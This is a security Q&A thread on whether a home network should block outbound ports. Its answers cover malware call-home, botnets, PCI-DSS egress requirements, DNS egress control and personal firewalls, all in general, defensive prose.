71

In terms of a home network, is there any reason to set up a router firewall so that all outgoing ports are blocked, and then open specific ports for things such as HTTP, HTTPS, etc. Given that every computer on the network is trusted, surely the amount of extra security provided by blocking outgoing ports would be pretty much negligible?

Scott Pack
  • 15,217
  • 5
  • 62
  • 91
Alex McCloy
  • 813
  • 1
  • 7
  • 5
  • 16
    Could help prevent your computer from becoming part of a botnet if your computer becomes compromised somehow. – Chad Harrison Nov 21 '12 at 17:19
  • 4
    In my home network, I neglected to block outgoing ports. I quickly wisened up when an exploit in the mail server was used to upload a boostrap piece of malware, which was just a script that made an outgoing connection to download the rest of the malware. The attack could have been mitigated had the bootstrap piece not been able to phone home. – Kaz Nov 21 '12 at 22:06
  • 2
    I'd recommend to ALSO block outgoing http, https, ssh, etc: only open what you need AT A GIVEN TIME (on critical servers). For example: A server doesn't need to be able to reach the web (or its own updates) apart from the time of the day where it is updating... So if attacked at another period, having outgoing http/https/ssh/whatever blocked will help reducing the attacker's ability to download a payload or use your network in some way. – Olivier Dulac Jun 11 '13 at 12:35
  • 8
    "Given that every computer on the network is trusted" -- This is a bad assumption. – u2702 Jul 08 '13 at 15:33

12 Answers12

71

Blocking outbound traffic is usually of benefit in limiting what an attacker can do once they've compromised a system on your network.

So for example if they've managed to get malware onto a system (via an infected e-mail or browser page), the malware might try to "call home" to a command and control system on the Internet to get additional code downloaded or to accept tasks from a control system (e.g. sending spam)

Blocking outbound traffic can help stop this from happening, so it's not so much stopping you getting infected as making it less bad when it's happened.

Could be overkill for a home network tho' as there's a lot of programs which make connections outbound and you'd need to spend a bit of time setting up all the exceptions.

Rory McCune
  • 61,541
  • 14
  • 140
  • 221
  • 1
    Something similar happens on a windows PC's firewall. It is easier to manage. Whenever a new program that requests outbound connections to the internet is installed, an additional step must be made to allow outbound connections for the installed application (firefox, thunderbird, etc.). This is more manageable than central firewall blocking as a whole. – dadinck Nov 21 '12 at 18:10
  • 2
    @dadinck, but if the Admin account is compromised, would it not be possible for the attacker/virus/Trojan to change the Windows Firewall settings to allow the connection to the Command&Control? – Lex Apr 20 '13 at 08:10
  • 12
    Wouldn't any attacker just contact their command and control network over port 80 or 443? – bhspencer Feb 25 '16 at 19:13
  • 6
    @bhspencer, Yes, this exact thing happens. A specific case of this that I have heard about is where a program on an infected machine uses http GET's to ping a specific web address and waits to execute commands based on innocuous submissions to that page. – Shadoninja Apr 26 '16 at 22:10
  • 6
    @bhspencer thinking the same thing. If that's the case, then the whole exercise is pointless I think. – Ardee Aram Nov 19 '16 at 04:27
  • 2
    In a typical Win10 environment, how likely is it that malware will be able to whitelist itself in the Windows Firewall, and then call home? – Doochz Dec 16 '16 at 07:36
  • 1
    Yes, it *is* pointless for that reason to limit egress from a network. Inside a network, limiting egress on individual machines can prevent rapid spread of some old worms - but it cannot keep malware from "calling home" and downloading payload code. – foo Jan 22 '20 at 20:03
31

Coming from a security role, particularly if you've ever been involved in incident response, the idea of outbound filtering would seem a natural course in a high security environment. However, it is a very large and complex undertaking. Mention the words "egress filtering" to a firewall, network, or systems administrator and you'll likely get this response.

enter image description here

So while we know that high security environments may need this, and would warrant the extra work, it can sometimes be difficult to get buy-in. Particularly when a unit whose primary duty is to maintain uptime is suddenly asked to take on a potentially significant amount of extra maintenance to accomplish something that has a high probability of reducing uptime.

In this case we would be remis to not mention the compliance angle. Let's look at the PCI-DSS v2.0 for a moment. Requirements section 1 discusses systems and network security. This one is relevant here:

1.3.5

Do not allow unauthorized outbound traffic from the cardholder data environment to the Internet.

As much as we all like to talk about how "Compliance is a Starting Point" in the real world sometimes the only traction we can get is the goal of filling in that checkbox or passing that audit. Taking a look at compliance documents relevant to your field or service could be useful. While PCI-DSS is exclusively an industry requirement, agreed to by contract law, it is a fairly specific set of requirements that I have seen adopted as a standard to audit against in other places that have less well defined requirements.

Scott Pack
  • 15,217
  • 5
  • 62
  • 91
26

Unless you block all outgoing traffic other than a whitelist of legitimate websites you visit (and/or use a proxy that does whitelisting and security scanning), there's little additional security to be gained from blocking all ports except 80/443. Well, blocking port 25 might be good to keep your network from being used to send spam.

Many botnets already communicate over HTTP to connect to their command/control network since they know that other ports may be blocked (some even use DNS as their command/control protocol). So if you're going to let your network connect to any HTTP server, then you're not giving yourself much additional protection from joining a botnet, and you'll continually run into problems when you try to run things that use other ports like VPN, video conferencing, online gaming, websites on non-standard ports, FTP, etc. And you'd really need to regularly audit the logs to look for signs of infection.

Probably not worth the hassle on a home network. You're probably better off spending your time in trying to prevent malware infection in the first place than in mitigating damage once you've been infected.

Johnny
  • 1,418
  • 13
  • 19
  • 3
    `Well, blocking port 25 might be good to keep your network from being used to send spam.` What's stopping a malicious process from running a mail server on port 80? – Dean Meehan Mar 02 '17 at 10:59
  • 7
    The question is talking about blocking _outgoing_ ports... If there's a malicious mail server somewhere on the internet that's listening to port 80, it doesn't need my computer to connect to it to send spam, it can just send spam on its own. – Johnny Mar 02 '17 at 15:45
  • That is a *malicious server* already, then. But to keeping your own house clean, you want to avoid your network being the one sending out the spam - to bona fide mail servers, which will be listening on port tcp:25 (587, 465). – foo Dec 13 '22 at 15:56
13

Incoming traffic blocking can only prevent unsolicited traffic from reaching your internal network. However, if you get malware on an internal machine (via running an untrusted executable, or through an exploit) you can still be hit.

Blocking outgoing traffic helps limit the damage, by preventing the malware from connecting to a command & control server or exfiltrating data. Whilst your machine will still be compromised, it might save you from having your personal details stolen by a keylogger.

Polynomial
  • 133,763
  • 43
  • 302
  • 380
8

Two reasons:

  1. In the event that malware makes its way into your network, blocking outgoing traffic can sometimes contain the damage by preventing the malware from contacting a remote server. If you firewall at the machine level, you may also keep the malware from spreading further through your network. Disallowing outgoing traffic also means that your machine becomes less interesting as part of a botnet.
  2. Legitimate software with networking capabilities might be vulnerable and could be tricked into setting up outgoing connections which can then be used to further compromise your system. Consider, for example, a web server that runs an application with a flaw that allows an attacker to trick it into downloading files over the internet instead of opening local files (such a flaw is easy to produce and overlook in, for example, PHP). If you have it properly firewalled off, the request will simply fail, and maybe even trigger an alarm somewhere.
tdammers
  • 1,776
  • 9
  • 14
6

Blocking outgoing DNS queries so that DNS can only be routed through your preferred DNS server (enterprise DNS server, OpenDNS, Quad9, Google Public DNS, etc) is fairly commonplace on a network that has been somewhat secured.

US-CERT has an informative article about this, and lists the impacts of not doing so:

Unless managed by perimeter technical solutions, client systems and applications may connect to systems outside the enterprise’s administrative control for DNS resolution. Internal enterprise systems should only be permitted to initiate requests to and receive responses from approved enterprise DNS caching name servers. Permitting client systems and applications to connect directly to Internet DNS infrastructure introduces risks and inefficiencies to the organization, which include:

  • Bypassed enterprise monitoring and logging of DNS traffic; this type of monitoring is an important tool for detecting potential malicious
    network activity.
  • Bypassed enterprise DNS security filtering (sinkhole/redirect or blackhole/block) capabilities; this may allow clients to access malicious domains that would otherwise be blocked.
  • Client interaction with compromised or malicious DNS servers; this may cause inaccurate DNS responses for the domain requested (e.g.,
    the client is sent to a phishing site or served malicious code).
  • Lost protections against DNS cache poisoning and denial-of-service attacks. The mitigating effects of a tiered or hierarchical (e.g., separate internal and external DNS servers, split DNS, etc.) DNS architecture used to prevent such attacks are lost.
  • Reduced Internet browsing speed since enterprise DNS caching would not be utilized.

https://www.us-cert.gov/ncas/alerts/TA15-240A

5

Beyond damage-control after a compromise, you might also want to:

  • Control how (and whether) users and processes inside the network use the Internet

  • Monitor your inside processes to detect malware ("passive vulnerability scanning")

tylerl
  • 82,665
  • 26
  • 149
  • 230
3

" there's little additional security to be gained from blocking all ports except 80/443. "

unless you're running a proxy in order to disguise your IP, which code from a website (or injected into a website) could bypass by phoning home on a different port, thus bypassing your proxy (which will normally be configured only to reroute outgoing traffic on the ports usually used by your browser).

This is so simple that anybody using Tor should be aware of it, since it punches a hole right through the mask that Tor provides.

Solution: Route ALL ports through the proxy (Tor Does not recommend due to performance loss), or block all outgoing ports except for those specifically routed through your proxy.

mr random
  • 31
  • 1
1

A better approach for a home network is a software "personal firewall" that runs on each PC and prompts the user if they would like to allow a program that is trying to make an outbound connection to do so.

This, while annoying at first when it prompts you for everything while it tries to figure out what should be allowed, is easier to maintain in a home environment than a network firewall doing outbound blocking that has no concept of the difference between Google Chrome making a web page request and LulzBot2000 (yes, I made that up) making a web request for malware payloads.

Rod MacPherson
  • 1,067
  • 7
  • 11
0

The world might be a better place if more home routers defaulted to block outgoing ports like STMP, IRC, etc. And those are just off the top of my head.

I just landed here after turning off pretty much everything but ssh, http and https. It's a preventative measure, another layer of security, but in this case, it's preventing bad actors from using your network as a launching point for an attack.

That being said, I'm currently in the middle of debugging it, and while the Linux clients (my main Debian box, plus a Debian netbook, the internal name/file/print/time server running Debian, the HestiaPi thermostat) are all working fine. The Android phone is whining that there's no Internet (because I also setup caching/filtering DNS, then pointed all the clients at it, ala PiHole), but I can get to things that I use (pretty much web and SSH).

The Roku is another story; YouTube, Vimeo and even Netflix work fine, after (again) whining from Roku that there's no Internet because I won't let it contact it's precious ad servers (for the first time ever, the ads are gone on the main screen; I'll try to keep that at least). But Amazon and Hoopla both don't work, and given that I have to fire up a VPN on the work computer tomorrow, I will almost certainly be scaling back.

TL;DR - filtering outgoing is a good idea. At least close off outgoing connections to all the bad things you never use (telnet, R-commands, etc), and judiciously consider closing off others.

0

As others have mentioned above, blocking outgoing ports will minimize what an attacker can after your machine has already been infected. Let's take a look at the situation below:

  1. An attacker manages to compromise your machine with a R.A.T (Remote administration tool)
  2. Usually the way a RAT works is by connecting back to the attacker's machine to communicate with it, normally the RAT would be able to freely communicate with the attacker's machine.
  3. Let's assume you have all outgoing traffic blocked, the RAT can no longer communicate with the attacker's machine. This makes any information it's stolen from your PC essentially useless.

Just because you've stopped the RAT from communicating with the attacker's server doesn't mean your safe.

The RAT can still modify your file system, slow your machine depending on what it's doing, it's worth mentioning that if the RAT had privileges it could change your firewall's rules and enable outgoing traffic - allowing it to communicate with the attacker's server.

Crisp Apples
  • 101
  • 1
0

One reason for blocking outbound connections would be to set up a test environment. In order to set up a test environment, you'll likely need a managed switch, a physical firewall, a Raspberry Pi, and one or two laptops (at least one that has Linux on it, preferably). The reason you would utilize this in a test environment is to prevent yourself from sending malicious attacks to an unknown IP address, which could spell big trouble from the law if you do this accidentally.

schroeder
  • 125,553
  • 55
  • 289
  • 326